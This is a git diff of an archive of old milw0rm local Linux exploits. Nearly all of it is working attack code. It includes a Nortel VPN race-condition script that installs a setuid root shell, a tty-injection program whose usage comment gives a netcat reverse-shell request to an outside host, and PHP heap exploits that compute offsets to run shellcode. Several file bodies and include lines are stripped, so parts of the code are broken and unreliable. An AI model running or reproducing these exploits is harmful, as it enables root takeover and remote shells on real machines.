%s. Afterwards check your privilege level with id or whoami!\n",vscan); + execl(vscan, "vscan", ptr, NULL); + + } else { + + printf("Exploit failed. 
You seem not to have enough privileges to execute %s, sorry.\n",vscan); + printf("Hint: Ask your local admin to add yourself to the iscan group or let him make the vscan binary world-executable.\n"); + printf("Then try again :-)\n\n"); + exit(1); + + } + + return 0; + +} + +// milw0rm.com [2007-01-28] diff --git a/platforms/linux/local/322.c b/platforms/linux/local/322.c index 0ff452d32..47fb52b6e 100755 --- a/platforms/linux/local/322.c +++ b/platforms/linux/local/322.c @@ -50,6 +50,6 @@ main(int argc, char **argv) *ptr = 0; execl("/usr/X11R6/bin/xterm", "xterm", "-fg", buff, NULL); } - - -// milw0rm.com [1996-08-24] + + +// milw0rm.com [1996-08-24] diff --git a/platforms/linux/local/325.c b/platforms/linux/local/325.c index ab0cde222..f179ce11e 100755 --- a/platforms/linux/local/325.c +++ b/platforms/linux/local/325.c @@ -114,6 +114,6 @@ static void card(c, p2) *p1++ = '\n'; write(tfd, buf, len); } - - -// milw0rm.com [1996-10-25] + + +// milw0rm.com [1996-10-25] diff --git a/platforms/linux/local/331.c b/platforms/linux/local/331.c index 48ee5e72c..9dff8e398 100755 --- a/platforms/linux/local/331.c +++ b/platforms/linux/local/331.c @@ -63,6 +63,6 @@ i+=NOP_SIZE) { (mzhang@softcom.net)\n"); /* Don't need to set ur DISPLAY to exploit this one, cool huh? */ execl(CXTERM_PATH, "cxterm", "-xrm",buff, NULL); -} - -// milw0rm.com [1997-05-14] +} + +// milw0rm.com [1997-05-14] diff --git a/platforms/linux/local/3356.sh b/platforms/linux/local/3356.sh index 33d00dc4e..91f325894 100755 --- a/platforms/linux/local/3356.sh +++ b/platforms/linux/local/3356.sh 
@@ -1,195 +1,195 @@ -#!/bin/sh -# -# Nortel SSL VPN Linux Client race condition -# -# Jon Hart -# -# The Linux client that is utilized by versions priot to 6.05 of the Nortel -# SSL VPN appliance suffers from a number of problems that, in combination, -# allow an unprivileged local user to obtain root privileges. -# -# This particular bug is as follows: -# 1) SSL VPN is initiated from the startNetdirect() javascript call -# 2) A zip archive is downloaded to the local machine which contains three -# binaries necessary for the client: askpass, client, and surun. This -# archive is written to /tmp, chmod'd 777, and then it is extracted into -# /tmp/NetClient -# 3) All of these files are chmod'd world writable by the following java -# snippet, which is called on all UNIX client OSs: -# -# protected boolean setPermissions(String file) -# { -# String command = "chmod a+xw " + file; -# try -# { -# Process p = Runtime.getRuntime().exec(command); -# p.waitFor(); -# } -# ... -# } -# -# 4) /tmp/NetClient/surun is executed, which in turn runs -# /tmp/NetClient/askpass. This process aquires the root password, and -# then executes /tmp/NetClient/client via /bin/su and the root password. -# -# There is clearly a bug in step 2 and 3 whereby files are installed world -# writable. The bug I chose to exploit is the race condition in step 4, -# combined with the insecure permissions of steps 2 and 3, which (IMO), -# gives root more easily. The risk here is if you have untrusted accounts -# on the machine from which you access the Nortel VPN, those accounts can -# easily gain local root access. -# -# The exploit is fairly simple. Wait for /tmp/NetClient/client to appear, -# swap it for our "special version", and wait for a shell. -# -# Notes: a /tmp with nosuid will help mitigate this particular _exploit_, -# but not the vulnerability. The same vulnerability also exists in the Mac -# client. -# -# For education and testing purposes only. 
Only run this on systems that -# you maintain/control. -# - -cleanup() { - rm -f $TMP_DIR/.*-$$\..* -} - - -run_cmd() { - CMD=$@ - VPN_CLIENT_RUN=`mktemp -t vpn_client_run-$$.XXXXXXXX` - - echo "Waiting for writable client" - while (true); do - if [ -w $CLIENT ]; then - OLD_CLIENT=`mktemp -t old_client-$$.XXXXXXXXXX` - echo "Saving old client" - cp $CLIENT $OLD_CLIENT - chmod 755 $OLD_CLIENT - echo "Writing new \"client\"" - echo "#!/bin/sh" > $CLIENT - echo "$CMD" >> $CLIENT - echo "rm -f $VPN_CLIENT_RUN" >> $CLIENT - # ensure the original client gets run so as to - # not alert the user - echo "exec $OLD_CLIENT \$@" >> $CLIENT - break - fi - done - - SUCCESS=0 - echo "Waiting for new client to be run" - while (true); do - if [ ! -f $VPN_CLIENT_RUN ]; then - SUCCESS=1 - break - else - sleep 2 - fi - done - - if [ $SUCCESS == 1 ]; then - echo "Success" - return 0 - else - echo "Exploit failed!" - cleanup - exit 1 - fi -} - -suid_shell() { - SH_C="sh_c-$$.c" - - # write out setuid shell - cat >> $SH_C << EOF - #include - #include - int main (int argc, char **argv) { - setuid(0); - setgid(0); - execl("/bin/bash", "bash", NULL); - } -EOF - - # try like hell to get this shell compiled - SH=`mktemp -t vpnshell-$$.XXXXXXXXXX` - gcc -o $SH $SH_C 2>&1 > /dev/null 2>&1 - if [ $? != 0 ]; then - cc -o $SH $SH_C 2>&1 > /dev/null 2>&1 - if [ $? != 0 ]; then - echo "Compilation of shell failed" - echo "Trying backup method..." - run_cmd "cp /bin/sh $SH && chmod 4755 $SH" - while (true); do - if [ -u $SH ]; then - $SH - cleanup - exit - else - sleep 1 - fi - done - echo "Failed" - cleanup - exit 1 - fi - fi - rm -f $SH_C - - run_cmd "chown root:root $SH && chmod 4755 $SH" - - # wait for our shell to be chmod'd - SUCCESS=0 - echo "Waiting for suid shell" - for sleep in `seq 1 60`; do - if [ -u $SH ]; then - echo "Success! setuid shell is $SH" - SUCCESS=1 - break - else - sleep 2 - fi - done - - if [ $SUCCESS == 1 ]; then - cleanup - $SH - else - rm -f $SH - echo "Exploit failed!" 
- cleanup - exit 1 - fi -} - -CLIENT="/tmp/NetClient/client" - -if [ -f $CLIENT ]; then - echo "client $CLIENT already exists -- forcing stop" - $CLIENT --stop - for sleep in `seq 1 60`; do - if [ ! -f $CLIENT ]; then - break - fi - sleep 1 - done -fi - -# hack to figure out where temp files get put... -TMP_FILE=`mktemp -t $$` -TMP_DIR=`dirname $TMP_FILE` -rm -f $TMP_FILE - -trap cleanup 1 2 3 15 - -# two modes of operation -- get a root shell, or run a cmd as root. -if [ -z "$1" ]; then - suid_shell -else - run_cmd $1 -fi - -cleanup - -# milw0rm.com [2007-02-21] +#!/bin/sh +# +# Nortel SSL VPN Linux Client race condition +# +# Jon Hart +# +# The Linux client that is utilized by versions priot to 6.05 of the Nortel +# SSL VPN appliance suffers from a number of problems that, in combination, +# allow an unprivileged local user to obtain root privileges. +# +# This particular bug is as follows: +# 1) SSL VPN is initiated from the startNetdirect() javascript call +# 2) A zip archive is downloaded to the local machine which contains three +# binaries necessary for the client: askpass, client, and surun. This +# archive is written to /tmp, chmod'd 777, and then it is extracted into +# /tmp/NetClient +# 3) All of these files are chmod'd world writable by the following java +# snippet, which is called on all UNIX client OSs: +# +# protected boolean setPermissions(String file) +# { +# String command = "chmod a+xw " + file; +# try +# { +# Process p = Runtime.getRuntime().exec(command); +# p.waitFor(); +# } +# ... +# } +# +# 4) /tmp/NetClient/surun is executed, which in turn runs +# /tmp/NetClient/askpass. This process aquires the root password, and +# then executes /tmp/NetClient/client via /bin/su and the root password. +# +# There is clearly a bug in step 2 and 3 whereby files are installed world +# writable. The bug I chose to exploit is the race condition in step 4, +# combined with the insecure permissions of steps 2 and 3, which (IMO), +# gives root more easily. 
The risk here is if you have untrusted accounts +# on the machine from which you access the Nortel VPN, those accounts can +# easily gain local root access. +# +# The exploit is fairly simple. Wait for /tmp/NetClient/client to appear, +# swap it for our "special version", and wait for a shell. +# +# Notes: a /tmp with nosuid will help mitigate this particular _exploit_, +# but not the vulnerability. The same vulnerability also exists in the Mac +# client. +# +# For education and testing purposes only. Only run this on systems that +# you maintain/control. +# + +cleanup() { + rm -f $TMP_DIR/.*-$$\..* +} + + +run_cmd() { + CMD=$@ + VPN_CLIENT_RUN=`mktemp -t vpn_client_run-$$.XXXXXXXX` + + echo "Waiting for writable client" + while (true); do + if [ -w $CLIENT ]; then + OLD_CLIENT=`mktemp -t old_client-$$.XXXXXXXXXX` + echo "Saving old client" + cp $CLIENT $OLD_CLIENT + chmod 755 $OLD_CLIENT + echo "Writing new \"client\"" + echo "#!/bin/sh" > $CLIENT + echo "$CMD" >> $CLIENT + echo "rm -f $VPN_CLIENT_RUN" >> $CLIENT + # ensure the original client gets run so as to + # not alert the user + echo "exec $OLD_CLIENT \$@" >> $CLIENT + break + fi + done + + SUCCESS=0 + echo "Waiting for new client to be run" + while (true); do + if [ ! -f $VPN_CLIENT_RUN ]; then + SUCCESS=1 + break + else + sleep 2 + fi + done + + if [ $SUCCESS == 1 ]; then + echo "Success" + return 0 + else + echo "Exploit failed!" + cleanup + exit 1 + fi +} + +suid_shell() { + SH_C="sh_c-$$.c" + + # write out setuid shell + cat >> $SH_C << EOF + #include + #include + int main (int argc, char **argv) { + setuid(0); + setgid(0); + execl("/bin/bash", "bash", NULL); + } +EOF + + # try like hell to get this shell compiled + SH=`mktemp -t vpnshell-$$.XXXXXXXXXX` + gcc -o $SH $SH_C 2>&1 > /dev/null 2>&1 + if [ $? != 0 ]; then + cc -o $SH $SH_C 2>&1 > /dev/null 2>&1 + if [ $? != 0 ]; then + echo "Compilation of shell failed" + echo "Trying backup method..." 
+ run_cmd "cp /bin/sh $SH && chmod 4755 $SH" + while (true); do + if [ -u $SH ]; then + $SH + cleanup + exit + else + sleep 1 + fi + done + echo "Failed" + cleanup + exit 1 + fi + fi + rm -f $SH_C + + run_cmd "chown root:root $SH && chmod 4755 $SH" + + # wait for our shell to be chmod'd + SUCCESS=0 + echo "Waiting for suid shell" + for sleep in `seq 1 60`; do + if [ -u $SH ]; then + echo "Success! setuid shell is $SH" + SUCCESS=1 + break + else + sleep 2 + fi + done + + if [ $SUCCESS == 1 ]; then + cleanup + $SH + else + rm -f $SH + echo "Exploit failed!" + cleanup + exit 1 + fi +} + +CLIENT="/tmp/NetClient/client" + +if [ -f $CLIENT ]; then + echo "client $CLIENT already exists -- forcing stop" + $CLIENT --stop + for sleep in `seq 1 60`; do + if [ ! -f $CLIENT ]; then + break + fi + sleep 1 + done +fi + +# hack to figure out where temp files get put... +TMP_FILE=`mktemp -t $$` +TMP_DIR=`dirname $TMP_FILE` +rm -f $TMP_FILE + +trap cleanup 1 2 3 15 + +# two modes of operation -- get a root shell, or run a cmd as root. +if [ -z "$1" ]; then + suid_shell +else + run_cmd $1 +fi + +cleanup + +# milw0rm.com [2007-02-21] diff --git a/platforms/linux/local/3384.c b/platforms/linux/local/3384.c index 878dfb4bd..c13256c4a 100755 --- a/platforms/linux/local/3384.c +++ b/platforms/linux/local/3384.c 
@@ -1,31 +1,31 @@
-/*
- :: Kristian Hermansen ::
- Date: 20070229
- Description: Local attacker can influence Apache to direct commands
- into an open tty owned by user who started apache process, usually root.
- This results in arbitrary command execution.
- Affects: Apache 1.3.33/1.3.34 on Debian Stable/Testing/Unstable/Experimental and Ubuntu Warty (4.10)/Hoary (5.04)/Breezy (5.10)/Dapper (6.06)
- Edgy (6.10), Feisty (7.04).
- Notes: Must have CGI execution privileges and
- service started manually by root via shell.
- Also try adding "Options +ExecCGI" to your .htaccess file.
- Compile: gcc -o /path/to/cgi-bin/cgipwn cgipwn.c
- Usage: nc -vvv -l -p 31337
- http://webserver/cgi-bin/cgipwn?nc%20myhost%2031337%20-e%20%2fbin%2f/sh%0d
- u53l355 gr33t5: yawn, jellyfish, phzero, pegasus, b9punk, phar, shardy,
- benkurtz, ... and who could forget ... setient (the gremlin)!!
-*/
-
-#include
-#include
-
-int main(int argc, char *argv[]) {
- int pts = open("/dev/tty",O_RDONLY);
- while(*argv[1] != '\0') {
- ioctl(pts,TIOCSTI,argv[1]);
- argv[1]++;
- }
- return 0;
-}
-
-// milw0rm.com [2007-02-28]
+/*
+ :: Kristian Hermansen ::
+ Date: 20070229
+ Description: Local attacker can influence Apache to direct commands
+ into an open tty owned by user who started apache process, usually root.
+ This results in arbitrary command execution.
+ Affects: Apache 1.3.33/1.3.34 on Debian Stable/Testing/Unstable/Experimental and Ubuntu Warty (4.10)/Hoary (5.04)/Breezy (5.10)/Dapper (6.06)
+ Edgy (6.10), Feisty (7.04).
+ Notes: Must have CGI execution privileges and
+ service started manually by root via shell.
+ Also try adding "Options +ExecCGI" to your .htaccess file.
+ Compile: gcc -o /path/to/cgi-bin/cgipwn cgipwn.c
+ Usage: nc -vvv -l -p 31337
+ http://webserver/cgi-bin/cgipwn?nc%20myhost%2031337%20-e%20%2fbin%2f/sh%0d
+ u53l355 gr33t5: yawn, jellyfish, phzero, pegasus, b9punk, phar, shardy,
+ benkurtz, ... and who could forget ... setient (the gremlin)!!
+*/ + +#include +#include + +int main(int argc, char *argv[]) { + int pts = open("/dev/tty",O_RDONLY); + while(*argv[1] != '\0') { + ioctl(pts,TIOCSTI,argv[1]); + argv[1]++; + } + return 0; +} + +// milw0rm.com [2007-02-28] diff --git a/platforms/linux/local/339.c b/platforms/linux/local/339.c index 6c2d9dfd4..8dc57eac6 100755 --- a/platforms/linux/local/339.c +++ b/platforms/linux/local/339.c @@ -53,6 +53,6 @@ main() { setenv("HOME", buffer, 1); execl("/usr/bin/zgv", "/usr/bin/zgv", NULL); -} - -// milw0rm.com [1997-06-20] +} + +// milw0rm.com [1997-06-20] diff --git a/platforms/linux/local/3426.php b/platforms/linux/local/3426.php index 654d11f80..690c10a2d 100755 --- a/platforms/linux/local/3426.php +++ b/platforms/linux/local/3426.php @@ -1,94 +1,94 @@ - - -# milw0rm.com [2007-03-07] + + +# milw0rm.com [2007-03-07] diff --git a/platforms/linux/local/3427.php b/platforms/linux/local/3427.php index 80eee4a33..01c93a162 100755 --- a/platforms/linux/local/3427.php +++ b/platforms/linux/local/3427.php @@ -1,68 +1,68 @@ - 0) - break; - } - } - $offset += 1024; - } - - header("Content-type: application/octet-stream"); - header("Content-Disposition: attachment; filename=\"server.der\""); - echo $keydata; -?> - -# milw0rm.com [2007-03-07] + 0) + break; + } + } + $offset += 1024; + } + + header("Content-type: application/octet-stream"); + header("Content-Disposition: attachment; filename=\"server.der\""); + echo $keydata; +?> + +# milw0rm.com [2007-03-07] diff --git a/platforms/linux/local/3440.php b/platforms/linux/local/3440.php index 2609519c2..17517c8be 100755 --- a/platforms/linux/local/3440.php +++ b/platforms/linux/local/3440.php @@ -1,47 +1,47 @@ - - -# milw0rm.com [2007-03-09] + + +# milw0rm.com [2007-03-09] diff --git a/platforms/linux/local/3479.php b/platforms/linux/local/3479.php index b88033a6b..744f01a01 100755 --- a/platforms/linux/local/3479.php +++ b/platforms/linux/local/3479.php 
@@ -1,154 +1,154 @@ - - -# milw0rm.com [2007-03-14] + + +# milw0rm.com [2007-03-14] diff --git a/platforms/linux/local/3480.php b/platforms/linux/local/3480.php index a46311382..0152d2069 100755 --- a/platforms/linux/local/3480.php +++ b/platforms/linux/local/3480.php 
@@ -1,159 +1,159 @@ -= 5.2.0"); - } - findOffsets(); // Comment out if you want to just test the crash - - // Convert offsets into strings - $addr1 = pack("L", $offset_1); - $addr2 = pack("L", $offset_2); - - define("C0", $addr1[0]); - define("C1", $addr1[1]); - define("C2", $addr1[2]); - define("C3", $addr1[3]); - - define("M0", $addr2[0]); - define("M1", $addr2[1]); - define("M2", $addr2[2]); - define("M3", $addr2[3]); - - $c=1; - - function myErrorHandler() - { - global $c; - if ($c==1) { $c=0; return true; } - session_id(str_repeat("A", 100)); - - $GLOBALS['str'] = str_repeat("A", 39); - - for ($i=0; $i<7; $i++) { - $GLOBALS['str'][$i*4+0] = M0; - $GLOBALS['str'][$i*4+1] = M1; - $GLOBALS['str'][$i*4+2] = M2; - $GLOBALS['str'][$i*4+3] = M3; - } - $GLOBALS['str'][8*4+0] = C0; - $GLOBALS['str'][8*4+1] = C1; - $GLOBALS['str'][8*4+2] = C2; - $GLOBALS['str'][8*4+3] = C3; - - return true; - } - - function doit() - { - ini_set("session.hash_bits_per_character", 666); - - error_reporting(E_ALL); - set_error_handler("myErrorHandler"); - session_id(str_repeat(":", 39)); - session_start(); - } - - doit(); - - - - - - - // This function uses the substr_compare() vulnerability - // to get the offsets. 
- - function findOffsets() - { - global $offset_1, $offset_2, $shellcode; - // We need to NOT clear these variables, - // otherwise the heap is too segmented - global $memdump, $d, $arr; - - $sizeofHashtable = 39; - $maxlong = 0x7fffffff; - - // Signature of a big endian Hashtable of size 256 with 1 element - $search = "\x00\x01\x00\x00\xff\x00\x00\x00\x01\x00\x00\x00"; - - $memdump = str_repeat("A", 4096); - for ($i=0; $i<400; $i++) { - $d[$i]=array(); - } - unset($d[350]); - $x = str_repeat("\x01", $sizeofHashtable); - unset($d[351]); - unset($d[352]); - $arr = array(); - for ($i=0; $i<129; $i++) { $arr[$i] = 1; } - $arr[$shellcode] = 1; - for ($i=0; $i<129; $i++) { unset($arr[$i]); } - - // If the libc memcmp leaks the information use it - // otherwise we only get a case insensitive memdump - $b = substr_compare(chr(65),chr(0),0,1,false) != 65; - - for ($i=0; $i<4096; $i++) { - $y = substr_compare($x, chr(0), $i+1, $maxlong, $b); - $Y = substr_compare($x, chr(1), $i+1, $maxlong, $b); - if ($y-$Y == 1 || $Y-$y==1){ - $y = chr($y); - if ($b && strtoupper($y)!=$y) { - if (substr_compare($x, $y, $i+1, $maxlong, false)==-1) { - $y = strtoupper($y); - } - } - $memdump[$i] = $y; - } else { - $y = substr_compare($x, chr(1), $i+1, $maxlong, $b); - $Y = substr_compare($x, chr(2), $i+1, $maxlong, $b); - if ($y-$Y != 1 && $Y-$y!=1){ - $memdump[$i] = chr(1); - } else { - $memdump[$i] = chr(0); - } - } - } - - // Search shellcode and hashtable and calculate memory address - $pos_shellcode = strpos($memdump, $shellcode); - $pos_hashtable = strpos($memdump, $search); - $addr = substr($memdump, $pos_hashtable+6*4, 4); - $addr = unpack("L", $addr); - - // Fill in both offsets - $offset_1 = $addr[1] + 32; - $offset_2 = $offset_1 - $pos_shellcode + $pos_hashtable + 8*4; - } - -?> - -# milw0rm.com [2007-03-14] += 5.2.0"); + } + findOffsets(); // Comment out if you want to just test the crash + + // Convert offsets into strings + $addr1 = pack("L", $offset_1); + $addr2 = pack("L", 
$offset_2); + + define("C0", $addr1[0]); + define("C1", $addr1[1]); + define("C2", $addr1[2]); + define("C3", $addr1[3]); + + define("M0", $addr2[0]); + define("M1", $addr2[1]); + define("M2", $addr2[2]); + define("M3", $addr2[3]); + + $c=1; + + function myErrorHandler() + { + global $c; + if ($c==1) { $c=0; return true; } + session_id(str_repeat("A", 100)); + + $GLOBALS['str'] = str_repeat("A", 39); + + for ($i=0; $i<7; $i++) { + $GLOBALS['str'][$i*4+0] = M0; + $GLOBALS['str'][$i*4+1] = M1; + $GLOBALS['str'][$i*4+2] = M2; + $GLOBALS['str'][$i*4+3] = M3; + } + $GLOBALS['str'][8*4+0] = C0; + $GLOBALS['str'][8*4+1] = C1; + $GLOBALS['str'][8*4+2] = C2; + $GLOBALS['str'][8*4+3] = C3; + + return true; + } + + function doit() + { + ini_set("session.hash_bits_per_character", 666); + + error_reporting(E_ALL); + set_error_handler("myErrorHandler"); + session_id(str_repeat(":", 39)); + session_start(); + } + + doit(); + + + + + + + // This function uses the substr_compare() vulnerability + // to get the offsets. 
+ + function findOffsets() + { + global $offset_1, $offset_2, $shellcode; + // We need to NOT clear these variables, + // otherwise the heap is too segmented + global $memdump, $d, $arr; + + $sizeofHashtable = 39; + $maxlong = 0x7fffffff; + + // Signature of a big endian Hashtable of size 256 with 1 element + $search = "\x00\x01\x00\x00\xff\x00\x00\x00\x01\x00\x00\x00"; + + $memdump = str_repeat("A", 4096); + for ($i=0; $i<400; $i++) { + $d[$i]=array(); + } + unset($d[350]); + $x = str_repeat("\x01", $sizeofHashtable); + unset($d[351]); + unset($d[352]); + $arr = array(); + for ($i=0; $i<129; $i++) { $arr[$i] = 1; } + $arr[$shellcode] = 1; + for ($i=0; $i<129; $i++) { unset($arr[$i]); } + + // If the libc memcmp leaks the information use it + // otherwise we only get a case insensitive memdump + $b = substr_compare(chr(65),chr(0),0,1,false) != 65; + + for ($i=0; $i<4096; $i++) { + $y = substr_compare($x, chr(0), $i+1, $maxlong, $b); + $Y = substr_compare($x, chr(1), $i+1, $maxlong, $b); + if ($y-$Y == 1 || $Y-$y==1){ + $y = chr($y); + if ($b && strtoupper($y)!=$y) { + if (substr_compare($x, $y, $i+1, $maxlong, false)==-1) { + $y = strtoupper($y); + } + } + $memdump[$i] = $y; + } else { + $y = substr_compare($x, chr(1), $i+1, $maxlong, $b); + $Y = substr_compare($x, chr(2), $i+1, $maxlong, $b); + if ($y-$Y != 1 && $Y-$y!=1){ + $memdump[$i] = chr(1); + } else { + $memdump[$i] = chr(0); + } + } + } + + // Search shellcode and hashtable and calculate memory address + $pos_shellcode = strpos($memdump, $shellcode); + $pos_hashtable = strpos($memdump, $search); + $addr = substr($memdump, $pos_hashtable+6*4, 4); + $addr = unpack("L", $addr); + + // Fill in both offsets + $offset_1 = $addr[1] + 32; + $offset_2 = $offset_1 - $pos_shellcode + $pos_hashtable + 8*4; + } + +?> + +# milw0rm.com [2007-03-14] diff --git a/platforms/linux/local/3499.php b/platforms/linux/local/3499.php index d2e412e48..0dfd1a450 100755 --- a/platforms/linux/local/3499.php 
+++ b/platforms/linux/local/3499.php @@ -1,53 +1,53 @@ - 1, "B" => 1); - - function array_compare(&$key1, &$key2) - { - $GLOBALS['a'] = &$key2; - unset($key2); - return 1; - } - - uksort($arr, "array_compare"); - $x=array($shellcode => 1); - - $a[8*4+0] = $a[6*4+0]; - $a[8*4+1] = chr(ord($a[6*4+1])+2); // <--- This only works for Little Endian - $a[8*4+2] = $a[6*4+2]; - $a[8*4+3] = $a[6*4+3]; - - unset($x); - -?> - -# milw0rm.com [2007-03-16] + 1, "B" => 1); + + function array_compare(&$key1, &$key2) + { + $GLOBALS['a'] = &$key2; + unset($key2); + return 1; + } + + uksort($arr, "array_compare"); + $x=array($shellcode => 1); + + $a[8*4+0] = $a[6*4+0]; + $a[8*4+1] = chr(ord($a[6*4+1])+2); // <--- This only works for Little Endian + $a[8*4+2] = $a[6*4+2]; + $a[8*4+3] = $a[6*4+3]; + + unset($x); + +?> + +# milw0rm.com [2007-03-16] diff --git a/platforms/linux/local/3525.php b/platforms/linux/local/3525.php index d22d24642..6e7418e4c 100755 --- a/platforms/linux/local/3525.php +++ b/platforms/linux/local/3525.php 
@@ -1,176 +1,176 @@ -> 2, new dummyclass(), $value); - } - - function peek($addr) - { - $GLOBALS['img'] = imagecreate(1, 1); - return imagecolorat($GLOBALS['img'], $addr >> 2, new dummyclass()); - } - - printf("Using offsets %08x and %08x\n", $offset_1, $offset_2); - - error_reporting(E_ALL); - set_error_handler("myErrorHandler"); - poke($offset_2, $offset_1); - unset($d); - - - - - - - - - - - - - - - - - // This function uses the substr_compare() vulnerability - // to get the offsets. - - function findOffsets() - { - global $offset_1, $offset_2, $shellcode; - // We need to NOT clear these variables, - // otherwise the heap is too segmented - global $memdump, $d, $arr; - - $sizeofHashtable = 39; - $maxlong = 0x7fffffff; - - // Signature of a big endian Hashtable of size 256 with 1 element - $search = "\x00\x01\x00\x00\xff\x00\x00\x00\x01\x00\x00\x00"; - - $memdump = str_repeat("A", 18192); - for ($i=0; $i<400; $i++) { - $d[$i]=array(); - } - unset($d[350]); - $x = str_repeat("\x01", $sizeofHashtable); - unset($d[351]); - unset($d[352]); - $arr = array(); - for ($i=0; $i<129; $i++) { $arr[$i] = 1; } - $arr[$shellcode] = 1; - for ($i=0; $i<129; $i++) { unset($arr[$i]); } - - // If the libc memcmp leaks the information use it - // otherwise we only get a case insensitive memdump - $b = substr_compare(chr(65),chr(0),0,1,false) != 65; - - for ($i=0; $i<18192; $i++) { - $y = substr_compare($x, chr(0), $i+1, $maxlong, $b); - $Y = substr_compare($x, chr(1), $i+1, $maxlong, $b); - if ($y-$Y == 1 || $Y-$y==1){ - $y = chr($y); - if ($b && strtoupper($y)!=$y) { - if (substr_compare($x, $y, $i+1, $maxlong, false)==-1) { - $y = strtoupper($y); - } - } - $memdump[$i] = $y; - } else { - $y = substr_compare($x, chr(1), $i+1, $maxlong, $b); - $Y = substr_compare($x, chr(2), $i+1, $maxlong, $b); - if ($y-$Y != 1 && $Y-$y!=1){ - $memdump[$i] = chr(1); - } else { - $memdump[$i] = chr(0); - } - } - } - - // Search shellcode and hashtable and calculate memory address - $pos_shellcode = 
strpos($memdump, $shellcode); - $pos_hashtable = strpos($memdump, $search); - - if ($pos_shellcode == 0 || $pos_hashtable == 0) { - die ("Unable to find offsets"); - } - - $addr = substr($memdump, $pos_hashtable+6*4, 4); - $addr = unpack("L", $addr); - // Fill in both offsets - $offset_1 = $addr[1] + 32; - $offset_2 = $offset_1 - $pos_shellcode + $pos_hashtable + 8*4; - } -?> - -# milw0rm.com [2007-03-20] +> 2, new dummyclass(), $value); + } + + function peek($addr) + { + $GLOBALS['img'] = imagecreate(1, 1); + return imagecolorat($GLOBALS['img'], $addr >> 2, new dummyclass()); + } + + printf("Using offsets %08x and %08x\n", $offset_1, $offset_2); + + error_reporting(E_ALL); + set_error_handler("myErrorHandler"); + poke($offset_2, $offset_1); + unset($d); + + + + + + + + + + + + + + + + + // This function uses the substr_compare() vulnerability + // to get the offsets. + + function findOffsets() + { + global $offset_1, $offset_2, $shellcode; + // We need to NOT clear these variables, + // otherwise the heap is too segmented + global $memdump, $d, $arr; + + $sizeofHashtable = 39; + $maxlong = 0x7fffffff; + + // Signature of a big endian Hashtable of size 256 with 1 element + $search = "\x00\x01\x00\x00\xff\x00\x00\x00\x01\x00\x00\x00"; + + $memdump = str_repeat("A", 18192); + for ($i=0; $i<400; $i++) { + $d[$i]=array(); + } + unset($d[350]); + $x = str_repeat("\x01", $sizeofHashtable); + unset($d[351]); + unset($d[352]); + $arr = array(); + for ($i=0; $i<129; $i++) { $arr[$i] = 1; } + $arr[$shellcode] = 1; + for ($i=0; $i<129; $i++) { unset($arr[$i]); } + + // If the libc memcmp leaks the information use it + // otherwise we only get a case insensitive memdump + $b = substr_compare(chr(65),chr(0),0,1,false) != 65; + + for ($i=0; $i<18192; $i++) { + $y = substr_compare($x, chr(0), $i+1, $maxlong, $b); + $Y = substr_compare($x, chr(1), $i+1, $maxlong, $b); + if ($y-$Y == 1 || $Y-$y==1){ + $y = chr($y); + if ($b && strtoupper($y)!=$y) { + if (substr_compare($x, $y, 
$i+1, $maxlong, false)==-1) { + $y = strtoupper($y); + } + } + $memdump[$i] = $y; + } else { + $y = substr_compare($x, chr(1), $i+1, $maxlong, $b); + $Y = substr_compare($x, chr(2), $i+1, $maxlong, $b); + if ($y-$Y != 1 && $Y-$y!=1){ + $memdump[$i] = chr(1); + } else { + $memdump[$i] = chr(0); + } + } + } + + // Search shellcode and hashtable and calculate memory address + $pos_shellcode = strpos($memdump, $shellcode); + $pos_hashtable = strpos($memdump, $search); + + if ($pos_shellcode == 0 || $pos_hashtable == 0) { + die ("Unable to find offsets"); + } + + $addr = substr($memdump, $pos_hashtable+6*4, 4); + $addr = unpack("L", $addr); + // Fill in both offsets + $offset_1 = $addr[1] + 32; + $offset_2 = $offset_1 - $pos_shellcode + $pos_hashtable + 8*4; + } +?> + +# milw0rm.com [2007-03-20] diff --git a/platforms/linux/local/3529.php b/platforms/linux/local/3529.php index d0275e673..0d7ed3fa9 100755 --- a/platforms/linux/local/3529.php +++ b/platforms/linux/local/3529.php @@ -1,133 +1,133 @@ - - -# milw0rm.com [2007-03-20] + + +# milw0rm.com [2007-03-20] diff --git a/platforms/linux/local/3571.php b/platforms/linux/local/3571.php index 4bef9865f..0da1d2d03 100755 --- a/platforms/linux/local/3571.php +++ b/platforms/linux/local/3571.php @@ -1,43 +1,43 @@ - - -# milw0rm.com [2007-03-25] + + +# milw0rm.com [2007-03-25] diff --git a/platforms/linux/local/3572.php b/platforms/linux/local/3572.php index 9c176a3a3..b1125c614 100755 --- a/platforms/linux/local/3572.php +++ b/platforms/linux/local/3572.php @@ -1,112 +1,112 @@ - - -# milw0rm.com [2007-03-25] + + +# milw0rm.com [2007-03-25] diff --git a/platforms/linux/local/369.pl b/platforms/linux/local/369.pl index 9f929bbbd..f35500ee0 100755 --- a/platforms/linux/local/369.pl +++ b/platforms/linux/local/369.pl 
@@ -37,6 +37,6 @@ evilBuf = begin+"boom"*75+intel_order(retJmpEsp)+shellcode wavFile = open("britney.wav", "wb") wavFile.write(evilBuf) wavFile.close() -print "Evil Song has been created :Pp" - -# milw0rm.com [2004-08-01] +print "Evil Song has been created :Pp" + +# milw0rm.com [2004-08-01] diff --git a/platforms/linux/local/375.c b/platforms/linux/local/375.c index 9e615cf38..8077f030c 100755 --- a/platforms/linux/local/375.c +++ b/platforms/linux/local/375.c @@ -198,6 +198,6 @@ int main(int ac, char **av) kill(cpid, 9); return 0; -} - -// milw0rm.com [2004-08-04] +} + +// milw0rm.com [2004-08-04] diff --git a/platforms/linux/local/393.c b/platforms/linux/local/393.c index 129cb047f..c6e6b6d99 100755 --- a/platforms/linux/local/393.c +++ b/platforms/linux/local/393.c @@ -103,6 +103,6 @@ int main(int argc, char **argv) } return 0; -} - -// milw0rm.com [2004-08-13] +} + +// milw0rm.com [2004-08-13] diff --git a/platforms/linux/local/4028.txt b/platforms/linux/local/4028.txt index 4f0cca5fc..5ae820d99 100755 --- a/platforms/linux/local/4028.txt +++ b/platforms/linux/local/4028.txt 
